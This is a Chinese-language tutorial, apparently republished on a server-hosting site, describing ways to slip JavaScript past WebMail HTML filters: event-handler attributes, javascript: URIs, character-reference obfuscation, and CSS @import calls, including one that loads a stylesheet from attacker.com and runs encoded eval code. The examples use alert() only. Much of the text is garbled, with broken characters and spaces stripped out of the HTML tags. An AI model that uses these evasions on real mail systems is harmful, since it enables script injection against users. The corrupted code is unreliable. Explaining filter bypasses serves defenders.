|
鑒于腳本程序可能帶來(lái)的危險(xiǎn)�,WebMail系統(tǒng)完全有必要禁止html郵件中的腳本程序�����。禁止腳本程序的基本做法就是過(guò)濾掉html源程序中能夠使腳本程序運(yùn)行的代碼���,如script元素等��,在這方面做的最好的莫過(guò)于hotmail了。下面是些常見(jiàn)的繞過(guò)腳本程序過(guò)濾的方法�,不少的WebMail系統(tǒng)仍然沒(méi)有完全改正:
(1)在html語(yǔ)言里�,除了script元素內(nèi)的或在script元素內(nèi)引入的腳本程序能在html頁(yè)面裝載時(shí)被運(yùn)行外����,使用事件屬性也能調(diào)用腳本程序運(yùn)行�����,事件屬性在JavaScript語(yǔ)言里被稱為事件句柄����,用于對(duì)頁(yè)面上的某個(gè)特定事件(如鼠標(biāo)點(diǎn)擊����、表單提交)做出響應(yīng),驅(qū)動(dòng)javascript程序運(yùn)行�。它的語(yǔ)法如下:
<tagattribute1attribute2onEventName="javascriptcode��;">
例如:
以下為引用的內(nèi)容:
<bodyonload="alert('JavaScript#1isexecuted');">
<ahref="#"onclick="alert('JavaScript#2isexecuted')����;">Clickhere</a>
<formmethod="post"action="#"onsubmit="alert('JavaScript#3isexecuted')�;">
<inputtype="submit"value="Submit">
</form>
</body>
(2)URI(UniversalResourceIdentifier:通用資源標(biāo)識(shí))用于定位Internet上每種可用的資源����,如HTML文檔、圖像、聲音等�。瀏覽器根據(jù)URI的資源類型(URIscheme)調(diào)用相應(yīng)的程序操作該資源�����,如果把一些元素的URI屬性值的資源類型設(shè)為javascript�����,則能夠調(diào)用javascript程序運(yùn)行。語(yǔ)法如下,注意要用“����;”分隔不同的javascript語(yǔ)句:
<tagattribute="javascript:javascript-code;">
例如:
以下為引用的內(nèi)容:
<bodybackground="javascript:alert('JavaScript#1isexecuted')�����;">
<ahref="javascript:alert('JavaScript#2isexecuted')��;">Clickhere</a>
<formmethod="post"action="javascript:alert('JavaScript#3isexecuted')�;">
<inputtype="submit"value="Submit">
</form>
<imgsrc="javascript:alert('JavaScript#4isexecuted')���;">
</body>
(3)由于軟硬件或其他原因�����,一些冷僻或特殊的字符不能輸入或正確顯示在html頁(yè)面上����,為了解決這個(gè)問(wèn)題����,html中可以使用SGML字符參考。字符參考是一種用來(lái)指定文檔字符集中任何字符的獨(dú)立編碼機(jī)制���,以“&”開(kāi)始,以“�����;”結(jié)束�。字符參考有兩種表達(dá)方式:數(shù)字字符參考和實(shí)體字符參考。數(shù)字字符參考的語(yǔ)法為“&#D���;”(D代表一個(gè)十進(jìn)制數(shù)),或“&#xH����;”、“&#XH�;”(H代表一個(gè)十六進(jìn)制數(shù))���,例如“A�����;”、“A;”表示字母“A”,“水��;”��、“水����;”表示漢字“水”���。
攻擊者把html語(yǔ)句里的一些字符以數(shù)字字符參考來(lái)代替���,這樣能避開(kāi)WebMail系統(tǒng)對(duì)腳本程序的過(guò)濾����。需要注意的是,元素和屬性不可以用字符參考表示�����,例如:
以下為引用的內(nèi)容:
<body>
<imglowsrc="ja��;vasC��;ript:alert('JavaScript#1isexecuted')">
<ahref="j�;avA���;sC����;ript:��;aler�;t('JavaScript#2
i��;ܾxecuted')">Clickhere�����;</a>
<formmethod="post"action="javascript:alert('JavaScript#3is
executed')">
<inputtype="S;ubmit"value="Submit">
</form>
</body>
(4)樣式表是層疊樣式表單(CSS:CascadingStyleSheet)的簡(jiǎn)稱����,用于控制�����、增強(qiáng)或統(tǒng)一網(wǎng)頁(yè)上的樣式(如字體、顏色等),它能夠?qū)邮叫畔⑴c網(wǎng)頁(yè)內(nèi)容相分離,在html語(yǔ)言的style標(biāo)簽內(nèi)可以用@import聲明輸入一個(gè)樣式表�。但是����,如果輸入的資源類型或內(nèi)容是javascript��,InternetExplorer瀏覽器仍然會(huì)執(zhí)行����。
以下為引用的內(nèi)容:
例如:<styletype="text/css">
<!--
@importurl(javascript:alert('JavaScript#1isexecuted'))���;
@importurl(http://www.attacker.com/js.css)��;
-->
</style>
其中http://www.attacker.com/js.css的內(nèi)容如下所示:
以下為引用的內(nèi)容:
@importurl(javascript:alert('JavaScript#2isexecuted'));
@importurl(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)))�;
能夠繞過(guò)WebMail系統(tǒng)對(duì)腳本程序過(guò)濾的方法遠(yuǎn)不止上面所說(shuō)的這些�,例如曾有人發(fā)現(xiàn)把“<script>”標(biāo)簽改成“<_a<script>”和“<<script>”的樣子能繞過(guò)yahoo電郵的過(guò)濾�����,這個(gè)漏洞yahoo在最近才改正過(guò)來(lái)���。
本文出自:億恩科技【www.vbseamall.com】
服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)���!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商�����!15年品質(zhì)保障�����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
